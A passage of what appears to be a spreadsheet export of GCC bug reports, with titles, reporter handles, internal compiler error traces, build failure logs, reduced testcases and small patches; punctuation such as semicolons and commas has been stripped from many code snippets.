/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr46771.c:9:1: error: control flow in the middle of basic block 25
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr46771.c:9:1: error: control flow in the middle of basic block 25
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr46771.c:9:1: error: wrong outgoing edge flags at end of bb 25
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr46771.c:9:1: internal compiler error: verify_flow_info failed
0x7cba99 verify_flow_info()
	../../gcc/cfghooks.c:260
0xc50214 checking_verify_flow_info
	../../gcc/cfghooks.h:198
0xc50214 cleanup_tree_cfg_noloop
	../../gcc/tree-cfgcleanup.c:774
0xc50214 cleanup_tree_cfg()
	../../gcc/tree-cfgcleanup.c:820
0xb23c14 execute_function_todo
	../../gcc/passes.c:1919
0xb245a5 execute_todo
	../../gcc/passes.c:2016</t>
  </si>
  <si>
    <t>GCC-82119</t>
  </si>
  <si>
    <t>hsa</t>
  </si>
  <si>
    <t>Revision 251264 caused a number of run-time HSA failures</t>
  </si>
  <si>
    <t>I have tracked a number of new run-time HSA failures to r251264:
===== libgomp.sum =====
Tests that previously PASSED but now FAILED:
 libgomp.c/examples-4/declare_target-1.c execution test
 libgomp.c/pr66199-7.c execution test
 libgomp.c/pr66199-8.c execution test
 libgomp.c/pr66199-9.c execution test
 libgomp.c++/pr66199-7.C execution test
 libgomp.c++/pr66199-8.C execution test
 libgomp.c++/pr66199-9.C execution test
 libgomp.c++/target-9.C execution test
 libgomp.hsa.c/switch-1.c execution test
 libgomp.hsa.c/switch-branch-1.c execution test</t>
  </si>
  <si>
    <t>GCC-12157</t>
  </si>
  <si>
    <t>[3.4 regression] tree-checking ICE in eq_local_specializations</t>
  </si>
  <si>
    <t>Attached is a piece of code that for me generates this: 
&gt;&gt;  c++ -c fe_system.ii -funroll-loops -O2 
fe_system.ii: In member function `void FESystem::initialize() [with int dim = 1]': 
fe_system.ii:50211:   instantiated from here 
fe_system.ii:49542: internal compiler error: tree check: expected tree_list have goto_stmt in 
eq_local_specializations at cp/pt.c:1017 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
It doesn't ICE with different compile flags and it stops ICEing when I go to another  
machine :-( I don't have the time to track this down today maybe someone else wants 
to look at this.  
W.</t>
  </si>
  <si>
    <t>GCC-39930</t>
  </si>
  <si>
    <t>Bogus error: ambiguous reference</t>
  </si>
  <si>
    <t>Consider the following set of modules:
module a1
contains
  subroutine myRoutine
  end subroutine
end module 
module a2
contains
  subroutine myRoutine
  end subroutine
end module 
module b
contains
  subroutine otherRoutine
    use a1
    use a2
    call myRoutine		! this is ambiguous !
  end subroutine
  subroutine myRoutine
  end subroutine myRoutine	! this is not ambiguous !
end module
Feeding this to gfortran gives two errors:
all.f90:19.18:
    call myRoutine  ! this is ambiguous !
                  1
Error: Name 'myroutine' at (1) is an ambiguous reference to 'myroutine' from module 'a1'
all.f90:23.52:
  end subroutine myRoutine ! this is not ambiguous !
                                                    1
Error: Name 'myroutine' at (1) is an ambiguous reference to 'myroutine' from module 'a1'
This first error is ok the second is bogus. Same for all gfortran versions I tried (4.3.3 4.4.0 and trunk).</t>
  </si>
  <si>
    <t>GCC-19663</t>
  </si>
  <si>
    <t>LINK_GCC_C_SEQUENCE_SPEC doesn't play nice with RTEMS</t>
  </si>
  <si>
    <t>The LINK_GCC_C_SEQUENCE_SPEC provided by gcc/config/sparc/sparc.h is not
applicable to sparc-rtems.
IMO sparc.h's LINK_GCC_C_SEQUENCE_SPEC probably is specific to solaris and not
generally applicable. May-be it's an historic artefact.
I am going to apply the patch below to GCC-trunk to work-around this issue for
rtems.
Index: rtemself.h
===================================================================
RCS file: /cvs/gcc/gcc/gcc/config/sparc/rtemself.hv
retrieving revision 1.13
diff -u -r1.13 rtemself.h
--- rtemself.h  24 Jan 2005 21:31:52 -0000      1.13
+++ rtemself.h  28 Jan 2005 05:38:02 -0000
@@ -293 +296 @@
        builtin_assert (system=rtems)        \
     }                                          \
   while (0)
+
+/* Use the default */
+#undef LINK_GCC_C_SEQUENCE_SPEC</t>
  </si>
  <si>
    <t>GCC-16712</t>
  </si>
  <si>
    <t>[4.0 regression] Segmentation fault when accessing const array</t>
  </si>
  <si>
    <t>With the following c source (foo.i) I have segmentation fault:
typedef struct
{
  char n[129]
} A
const A C = {
  0
  0
}
extern const A *const B
void bar(const char *)
void foo ()
{
  bar (B-&gt;n)
}
const A *const B = 
Command line:
*gcc -c -O2 -o foo.i foo.c
Output:
foo.i: In function `foo':
foo.i:16: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>loki</t>
  </si>
  <si>
    <t>GCC-54125</t>
  </si>
  <si>
    <t>[4.8 regression] s-atopri.adb:40:10: Support_Atomic_Primitives is undefined broke Ada on multiple platforms</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.8-20120729 on sparc64-linux with Ada enabled fails with:
/mnt/scratch/objdir48/./gcc/xgcc -B/mnt/scratch/objdir48/./gcc/ -B/mnt/scratch/install48/sparc64-unknown-linux-gnu/bin/ -B/mnt/scratch/install48/sparc64-unknown-linux-gnu/lib/ -isystem /mnt/scratch/install48/sparc64-unknown-linux-gnu/include -isystem /mnt/scratch/install48/sparc64-unknown-linux-gnu/sys-include    -c -g -O2 -m64 -fPIC  -W -Wall -gnatpg -nostdinc -m64  s-atopri.adb -o s-atopri.o
s-atopri.adb:40:10: Support_Atomic_Primitives is undefined (more references follow)
make[9]: *** [s-atopri.o] Error 1
make[9]: *** Waiting for unfinished jobs....
make[9]: Leaving directory `/mnt/scratch/objdir48/gcc/ada/rts_64'
make[8]: *** [gnatlib] Error 2
make[8]: Leaving directory `/mnt/scratch/objdir48/gcc/ada'
make[7]: *** [gnatlib-shared-default] Error 2
make[7]: Leaving directory `/mnt/scratch/objdir48/gcc/ada'
make[6]: *** [gnatlib-shared-dual] Error 2
make[6]: Leaving directory `/mnt/scratch/objdir48/gcc/ada'
make[5]: *** [gnatlib-shared] Error 2
make[5]: Leaving directory `/mnt/scratch/objdir48/gcc/ada'
make[4]: *** [gnatlib-shared] Error 2
make[4]: Leaving directory `/mnt/scratch/objdir48/sparc64-unknown-linux-gnu/64/libada'
make[3]: *** [multi-do] Error 1
make[3]: Leaving directory `/mnt/scratch/objdir48/sparc64-unknown-linux-gnu/libada'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/mnt/scratch/objdir48/sparc64-unknown-linux-gnu/libada'
make[1]: *** [all-target-libada] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir48'
make: *** [bootstrap] Error 2
The previous weekly snapshot 4.8-20120722 bootstrapped fine on this machine with the same configuration options.</t>
  </si>
  <si>
    <t>GCC-50890</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in fold_convert_loc at fold-const.c:1894</t>
  </si>
  <si>
    <t>r172609 (http://gcc.gnu.org/viewcvs?limit_changes=0&amp;view=revision&amp;revision=172609) caused ICE with -O2 or -O1 -finline-small-functions on this (invalid?) testcase note function pointer type cast:
static float make_insn_raw (void)
{
  return 0
}
static int emit_pattern_after_noloc (int (make_raw) ()) 
{
  return make_raw ()
}
void emit_insn_after_noloc (void) 
{
  emit_pattern_after_noloc ((void *) make_insn_raw)
}
bug.c:8:3: internal compiler error: in fold_convert_loc at fold-const.c:1894</t>
  </si>
  <si>
    <t>GCC-61529</t>
  </si>
  <si>
    <t>[5 Regression] ICE on valid code at -O3 on x86_64-linux-gnu in check_probability at basic-block.h:953</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O3 on x86_64-linux-gnu in both 32-bit and 64-bit modes.
It is a regression from 4.9.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.10.0 20140616 (experimental) [trunk revision 211707] (GCC) 
$ 
$ gcc-trunk -O2 small.c a.out
$ gcc-4.9 -O3 small.c a.out
$ 
$ gcc-trunk -O3 small.c
small.c: In function â€˜fn1â€™:
small.c:4:1: internal compiler error: in check_probability at basic-block.h:953
 fn1 ()
 ^
0xb905e6 check_probability
	../../gcc-trunk/gcc/basic-block.h:953
0xb8dde1 check_probability
	../../gcc-trunk/gcc/tree-vect-loop-manip.c:653
0xb8dde1 combine_probabilities
	../../gcc-trunk/gcc/basic-block.h:962
0xb8dde1 slpeel_tree_peel_loop_to_edge
	../../gcc-trunk/gcc/tree-vect-loop-manip.c:1371
0xb8e154 vect_do_peeling_for_loop_bound(_loop_vec_info* tree_node* tree_node* unsigned int bool)
	../../gcc-trunk/gcc/tree-vect-loop-manip.c:1761
0xb7f3a7 vect_transform_loop(_loop_vec_info*)
	../../gcc-trunk/gcc/tree-vect-loop.c:5852
0xb9c286 vectorize_loops()
	../../gcc-trunk/gcc/tree-vectorizer.c:476
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
----------------------------
char a b c d e f g
void
fn1 ()
{
  char h = 0
lbl:
  for (c = 0 c c = 0)
    for ( a)
      for (d = 1 d d++)
	if ((b &amp; ((g &gt; 0) &gt;= h)) ^ 2)
	  goto lbl
  for (f = 1 f f++)
    e ^= 1
}
int
main ()
{
  fn1 ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-6518</t>
  </si>
  <si>
    <t>???</t>
  </si>
  <si>
    <t xml:space="preserve">	the &lt;&lt;  operator will crash when passing a null pointer to it (2.95 does not)
Release:
3.0.2
Environment:
System: Linux x10 2.4.9-31 #1 Tue Feb 26 06:53:37 EST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --enable-version-specific-runtime-libs --prefix=/usr/local --program-suffix=-3.0.2
How-To-Repeat:
	#include 
#include 
int main ( void )
{
char * pt = NULL
cout &lt;&lt; pt &lt;&lt; endl
return 0
}</t>
  </si>
  <si>
    <t>plasmahh</t>
  </si>
  <si>
    <t>GCC-14414</t>
  </si>
  <si>
    <t>[4.0 regression] insn-attr tab build runs out of memory</t>
  </si>
  <si>
    <t>While doing a bootstrap of today's compiler on x86-64:
make[2]: Entering directory `/home/andi/gcc/obj-head/gcc'
stage1/xgcc -Bstage1/
-B/home/ak/src/gcc-head-040303/x86_64-unknown-linux-gnu/bin/   -g -O2 -DIN_GCC 
 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic
-Wno-long-long -Wold-style-definition -Wno-variadic-macros -Werror   
-DHAVE_CONFIG_H    -I. -I. -I/averell/src/src/gcc-head/gcc/gcc
-I/averell/src/src/gcc-head/gcc/gcc/.
-I/averell/src/src/gcc-head/gcc/gcc/../include  -c insn-attrtab.c \
  -o insn-attrtab.o
xxgcc: Internal error: Killed (program cc1)
Please submit a full bug report.
See  for instructions.
The Kill was an Out Of Memory kill because the compilation needed more than
1.5GB or so.</t>
  </si>
  <si>
    <t>GCC-20178</t>
  </si>
  <si>
    <t>COMPLEX function returns incompatible with g77</t>
  </si>
  <si>
    <t xml:space="preserve">
A function returning a COMPLEX value cannot be compiled in g77 and
called from gfortran (or vice versa) - doing so results in a segfault
or incorrect results.  (See test case below.)
This is a problem since for the near future g77 and gfortran are
likely to coexist on many systems and incompatible calling
conventions for F77 code means that libraries like the BLAS will have
to be provided in two flavors (g77 and gfortran) on the same system a
major headache for users (not to mention distributors).
Note that COMPLEX argument passing seems to be okay (the below test
case works fine if it is switched from a function into a subroutine).
Environment:
System: Linux fftw.org 2.6.3-1-686-smp #2 SMP Tue Feb 24 20:29:08 EST 2004 i686 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=/home/stevenj/gcc4 --enable-languages=cf95
How-To-Repeat:
Create two files arg1.f and arg1tst.f consisting of:
arg1.f:
      complex function arg1(x y)
      complex x y
      arg1 = x + y
      return
      end
arg1tst.f:
      program arg1tst
      complex xyz arg1
      x = cmplx(1.2.)
      y = cmplx(3.4.)
      z = arg1(xy)
      write(**) z
      end
Compile arg1.f with g77 (I'm using version 3.3.5):
	g77 -c arg1.f
Compile arg1tst.f with gfortran and link with arg1.o from above:
	gfortran arg1tst.f arg1.o -o arg1tst
Run ./arg1tst and the result on my system is:
	Segmentation fault
Expected output is: (  4.000000      6.000000    )</t>
  </si>
  <si>
    <t>stevenj</t>
  </si>
  <si>
    <t>GCC-51908</t>
  </si>
  <si>
    <t>[C++11] ICE in cp_parser_abort_tentative_parse with decltype and variable template arguments</t>
  </si>
  <si>
    <t>Testcase:
struct foo
{
    template 
    operator decltype(static_cast(0)) () const
}
--- CUT ---
Another testcase:
struct foo
{
    template 
    operator decltype(static_cast(nullptr)) () const
}</t>
  </si>
  <si>
    <t>GCC-56198</t>
  </si>
  <si>
    <t>[4.8 Regression] Go profiledbootstrap error</t>
  </si>
  <si>
    <t>My --enable-checking=release profiledbootstrap failed on an maybe uninitialized warning turned into -Werror in go/gofrontend/import-archive.cc.
Archive_file::read_header has:
  off_t local_nested_off
  if (!this-&gt;interpret_header(&amp;hdr off pname size &amp;local_nested_off))
    return false
  if (nested_off != NULL)
    *nested_off = local_nested_off
and the warning was complaining that local_nested_off might be uninitialized.
If Archive_file::interpret_header is what is called here then *nested_off might be indeed uninitialized even when the function returns true in particular for:
  else if (hdr-&gt;ar_name[1] == ' ')
    {
      // This is the symbol table.
      pname-&gt;clear()
    }
  else if (hdr-&gt;ar_name[1] == '/')
    {
      // This is the extended name table.
      pname-&gt;assign(1 '/')
    }
 BTW there seems to be also an inconsistency in that method the first write to
*nested_off in that method is not guarded by nested_off != NULL:
      *nested_off = 0
while the second one is:
      if (nested_off != NULL)
        *nested_off = y</t>
  </si>
  <si>
    <t>GCC-16448</t>
  </si>
  <si>
    <t>[4.0 Regression] FAIL: objc/execute/IMP.m compilation  -O0</t>
  </si>
  <si>
    <t>Executing on host: /mnt/gnu/gcc-3.3/objdir/gcc/xgcc -B/mnt/gnu/gcc-3.3/objdir/gc
c/ /mnt/gnu/gcc-3.3/gcc/gcc/testsuite/objc/execute/IMP.m  -w  -O0  -I/mnt/gnu/gc
c-3.3/gcc/gcc/testsuite/../../libobjc -L/mnt/gnu/gcc-3.3/objdir/hppa64-hp-hpux11
.11/./libobjc/.libs  -lobjc -lm   -o /mnt/gnu/gcc-3.3/objdir/gcc/testsuite/IMP.x
0    (timeout = 300)
ld: (Warning) Unsatisfied symbol _Unwind_RaiseException in file /mnt/gnu/gcc-3
.3/objdir/hppa64-hp-hpux11.11/./libobjc/.libs/libobjc.sl
1 warnings.
output is:
ld: (Warning) Unsatisfied symbol _Unwind_RaiseException in file /mnt/gnu/gcc-3
.3/objdir/hppa64-hp-hpux11.11/./libobjc/.libs/libobjc.sl
1 warnings.
FAIL: objc/execute/IMP.m compilation  -O0
This port currently uses SJLJ exception support (i.e. 
_Unwind_SjLj_RaiseException).</t>
  </si>
  <si>
    <t>GCC-61796</t>
  </si>
  <si>
    <t>gcc arm hardfloat</t>
  </si>
  <si>
    <t>When building crosscompile toolchain for arm with hardware floating point support toolchain is built with software floating point or at least that seems to be the case. The flags passed include:
-pipe -march=armv7-a -mtune=cortex-a9 -mfpu=neon -mfloat-abi=hard
I've noticed this behaviour while building eglibc. The relevant code for this seems to be located in the following files:
gcc/config/arm/arm.h
gcc/config/arm/arm-opts.h
gcc/gcc/config/arm/arm.opt
Regardles of the -mfloat-abi=hard flag being passed the gcc ends up setting __SOFTFP__ which is only set if -mfloat-abi=soft is passed. Command below shows how I tested this:
$ arm-openwrt-linux-gnueabi-gcc -x c - -E -dM /dev/null | fgrep SOFT
#define __SOFTFP__ 1
The following hack seems to fix the problem:
--- a/gcc/config/arm/arm.opt
+++ b/gcc/config/arm/arm.opt
@@ -1067 +1067 @@ Target RejectNegative Joined Enum(proces
 Specify the name of the target CPU
 mfloat-abi=
-Target RejectNegative Joined Enum(float_abi_type) Var(arm_float_abi) Init(TARGET_DEFAULT_FLOAT_ABI)
+Target RejectNegative Joined Enum(float_abi_type) Var(arm_float_abi) Init(ARM_FLOAT_ABI_HARD)
 Specify if floating point hardware should be used
 Enum
Because of the check in eglibc (paste below) compilation fails because __ARM_PCS_VFP is not set. The __ARM_PCS_VFP is only set if the hardware float is used - and that should be the case here is the relevant chunk from gcc/config/arm/arm.c:
      else if (arm_float_abi == ARM_FLOAT_ABI_HARD
               &amp;&amp; TARGET_HARD_FLOAT
               &amp;&amp; TARGET_VFP)
        arm_pcs_default = ARM_PCS_AAPCS_VFP
And the eglibc code refered to in the last section (libc/scripts/config.guess):
            if echo __ARM_PCS_VFP | $CC_FOR_BUILD -E - 2&gt;/dev/null \
                | grep -q __ARM_PCS_VFP
            then
                echo ${UNAME_MACHINE}-unknown-linux-${LIBC}eabi
            else
                echo ${UNAME_MACHINE}-unknown-linux-${LIBC}eabihf
            fi
Even though I've managed to compile eglibc successfully and entire system without issue I didn't manage to boot it. That might be a different problem but I'd like to hear your opinion about this bug first.
Luka</t>
  </si>
  <si>
    <t>luka.perkov</t>
  </si>
  <si>
    <t>GCC-5867</t>
  </si>
  <si>
    <t>[mac osx] gcc-20020304 bootstrap fails</t>
  </si>
  <si>
    <t>The gcc-20020304 bootstrap fails on Apple Darwin (== MacOS X) like
this:
/local/build/gcc-20020304-build/gcc/xgcc -shared-libgcc \
 -B/local/build/gcc-20020304-build/gcc/ -nostdinc++ \
 -L/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/src \
 -L/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/src/.libs \
 -B/usr/local/test/powerpc-apple-darwin5.2/bin/ \
 -B/usr/local/test/powerpc-apple-darwin5.2/lib/ -isystem \
 /usr/local/test/powerpc-apple-darwin5.2/include -nostdinc++ \
 -I/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2 \
 -I/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include \
 -I../../../../gcc-20020304/libstdc++-v3/libsupc++ \
 -I../../../../gcc-20020304/libstdc++-v3/libmath -g -O2 \
 -fno-implicit-templates -Wall -Wno-format -W -Wwrite-strings -Winline \
 -fdiagnostics-show-location=once -g -c \
 ../../../../gcc-20020304/libstdc++-v3/src/globals.cc -o globals.o
In file included from /local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/bits/localefwd.h:48
                 from /local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/ios:48
                 from /local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/istream:44
                 from /local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/fstream:45
                 from ../../../../gcc-20020304/libstdc++-v3/src/globals.cc:30:
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:66: `
   isalnum' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:67: `
   isalpha' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:68: `
   iscntrl' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:69: `
   isdigit' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:70: `
   isgraph' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:71: `
   islower' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:72: `
   isprint' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:73: `
   ispunct' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:74: `
   isspace' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:75: `
   isupper' not declared
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/cctype:76: `
   isxdigit' not declared
In file included from /local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/bits/locale_facets.h:392
                 from /local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/bits/basic_ios.h:41
                 from /local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/ios:51
                 from /local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/istream:44
                 from /local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/fstream:45
                 from ../../../../gcc-20020304/libstdc++-v3/src/globals.cc:30:
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h: In
   member function `bool std::ctype::is(unsigned int char) const':
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:50: no
   matching function for call to `isspace(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:53: no
   matching function for call to `isprint(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:56: no
   matching function for call to `iscntrl(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:59: no
   matching function for call to `isupper(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:62: no
   matching function for call to `islower(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:65: no
   matching function for call to `isalpha(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:68: no
   matching function for call to `isdigit(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:71: no
   matching function for call to `ispunct(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:74: no
   matching function for call to `isxdigit(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:77: no
   matching function for call to `isalnum(char&amp;)'
/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/include/powerpc-apple-darwin5.2/bits/ctype_inline.h:80: no
   matching function for call to `isgraph(char&amp;)'
make[4]: *** [globals.lo] Error 1
make[4]: Leaving directory `/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3/src'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3'
make[2]: *** [all-recursive-am] Error 2
make[2]: Leaving directory `/local/build/gcc-20020304-build/powerpc-apple-darwin5.2/libstdc++-v3'
make[1]: *** [all-target-libstdc++-v3] Error 2
make[1]: Leaving directory `/local/build/gcc-20020304-build'
make: *** [bootstrap] Error 2
Release:
3.1 20020304 (prerelease)
Environment:
Apple PowerMac G4 (2 533 MHz CPUs 256MB RAM)    Darwin 1.4
host: powerpc-apple-darwin5.2
build: powerpc-apple-darwin5.2
target: powerpc-apple-darwin5.2
configured with: ../gcc-20020304/configure --prefix=/usr/local/test --enable-cpplib --enable-libgcj --enable-shared --enable-version-specific-runtime-libs --with-local-prefix=/usr/local --enable-threads
How-To-Repeat:
env CC=gcc ../gcc-20020304/configure \
 --prefix=/usr/local/test \
 --enable-cpplib \
 --enable-libgcj \
 --enable-shared \
 --enable-version-specific-runtime-libs \
 --with-local-prefix=/usr/local \
 --enable-threads &amp;&amp;
  make bootstrap
The failure happens about 90 minutes into the build.</t>
  </si>
  <si>
    <t>beebe</t>
  </si>
  <si>
    <t>GCC-78107</t>
  </si>
  <si>
    <t>[7 Regression] verify_gimple failed ICE caused by Gimple loop splitting patch</t>
  </si>
  <si>
    <t>Created attachment 39881
test file
The commit r241374 is causing an ICE during verify_gimple on aarch64.
Erorr:
/build-aarch64-none-linux-gnu/install/bin/aarch64-none-linux-gnu-gcc -mcpu=xgene1+crypto -O3 -c /temp/reduce.1131.c
temp/reduce.1131.c: In function â€˜fooâ€™:
temp/reduce.1131.c:1:5: error: non-trivial conversion in unary operation
 int foo(const char *fmt)
     ^~~
int
char *
_42 = -str_33
/temp/reduce.1131.c:1:5: internal compiler error: verify_gimple failed
0xb4411c verify_gimple_in_cfg(function* bool)
	/src/gcc/gcc/tree-cfg.c:5208
0xa2b3fa execute_function_todo
	/src/gcc/gcc/passes.c:1965
0xa2be35 execute_todo
	/src/gcc/gcc/passes.c:2015</t>
  </si>
  <si>
    <t>matz</t>
  </si>
  <si>
    <t>tamar.christina</t>
  </si>
  <si>
    <t>GCC-51413</t>
  </si>
  <si>
    <t>Broken diagnostic with __builtin_offsetof</t>
  </si>
  <si>
    <t>A broken diagnostic is generated for the following invalid code snippet since GCC 4.1.2:
=============================================
struct A
{
  static void foo()
}
int i = __builtin_offsetof(A foo[1][1])
=============================================
bug.cc:6:36: warning: pointer to a function used in arithmetic [-Wpointer-arith]
bug.cc:6:39: warning: pointer to a function used in arithmetic [-Wpointer-arith]
bug.cc:6:40: error: cannot apply 'offsetof' to member function '#'indirect_ref' not supported by dump_decl#'</t>
  </si>
  <si>
    <t>GCC-22544</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] gcc ignores input file given on the command line</t>
  </si>
  <si>
    <t>gcc-3.4 introduced a syntax for compilation with inter-module analysis: 
  $ gcc -c foo1.c foo2.c -o foo.o 
gcc-4.0 performs the same with the command-line option -combine: 
  $ gcc -combine -c foo1.c foo2.c -o foo.o 
But Makefiles that have already switched to using the gcc-3.4 invocation 
convention are trapped: gcc-4.0 when invoked without -combine ignores 
all input files except the last one. 
  $ cat foo1.c 
  int foo1 (int x) { return 17 * x } 
  $ cat foo2.c 
  int foo2 (int x) { return 42 * x } 
  $ gcc -v 
  Using built-in specs. 
  Target: i686-pc-linux-gnu 
  Configured with: ../gcc-4.0.0/configure --prefix=/home/haible/gnu/arch/linuxgcc40 
--enable-shared --enable-threads --enable-__cxa_atexit 
--enable-languages=cc++javaobjc --enable-nls 
  Thread model: posix 
  gcc version 4.0.0 
  $ gcc -c foo1.c foo2.c -o foo.o &amp;&amp; nm foo.o 
  00000000 T foo2 
Expected result: An error as with gcc-3.3: 
  $ gcc -c foo1.c foo2.c -o foo.o &amp;&amp; nm foo.o 
  gcc: cannot specify -o with -c or -S and multiple compilations</t>
  </si>
  <si>
    <t>GCC-6598</t>
  </si>
  <si>
    <t>[m88k] configure identifies old/broken gcc as gcc and passes unknown options</t>
  </si>
  <si>
    <t>Motorola ships their boxes with SVR4 and a master piece of compiler suite which is basically a GNU cc with their own assembler and linker but a broken 'cc' frontend. The compiler identifies itself as the GNU compiler through the builtin defines but doesn't accept all command line options. They even scratched --help and --version :-(. '-g' and '-O' works -Wall doesn't which gets complained about during the bootstrap.
Now the problem is that the usual configure script identifies this as a gcc but I think it rather shouldn't.
It actually is a gcc-2.2.2 or 2.4.5. Not very clear. It does compile things.
Release:
gcc-3.0.4
Environment:
m88k-motorola-sysv4
How-To-Repeat:
Apply for a job at our company and make gcc run on m88k.</t>
  </si>
  <si>
    <t>sdack</t>
  </si>
  <si>
    <t>GCC-3638</t>
  </si>
  <si>
    <t>Template class instanciated using wrong type</t>
  </si>
  <si>
    <t>The compiler is generating a nested template class using the wrong type. The attached program generates the following output:
1) void foo() [with _T = int]
2) c1::c1() [with _T = int]
3) c1::c1() [with _T = long int]
The second line should be the same as the 3rd line. I think the 'typename' keyword is problematic.
Release:
20010402 (Debian prerelease)
Environment:
Debian i386</t>
  </si>
  <si>
    <t>GCC-14307</t>
  </si>
  <si>
    <t>[tree-ssa][merge] ICE in copy_to_mode_reg (explow.c:675)</t>
  </si>
  <si>
    <t>With Andrew's patch for 14272 I now get cc1plus ICEs in 64-Bit mode.
A reduced testcase is this compile with -m64 -O0:
  struct locale
  {
    int i
    ~locale()
  }
  struct basic_ios
  {
    locale getloc () const { }
  }
  void copyfmt(const basic_ios&amp; __rhs)
  {
    __rhs.getloc()
  }
The error message is:
cc1plus -O0 -m64 -quiet io.cc
io.cc: In function `void copyfmt(const basic_ios&amp;)':
io.cc:12: internal compiler error: in copy_to_mode_reg at explow.c:675
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
   regards Christian</t>
  </si>
  <si>
    <t>ehrhardt</t>
  </si>
  <si>
    <t>GCC-3572</t>
  </si>
  <si>
    <t>GCC  2.96  preprocessor(?) crashes with -gdwarf option</t>
  </si>
  <si>
    <t>Compiling any file with the attached options produces the following error:
ccppc   -mcpu=604 -c -o3 -gdwarf -DSSP_DEBUG -DSSP_PPC -DHW_PROCESSOR=7410      -Ic:\osprey\install\include blinkled.c -blinkled0.obj
blinkled.c:229: Internal compiler error:
blinkled.c:229: Internal compiler error in `output_type' at dwarfout.c:4548
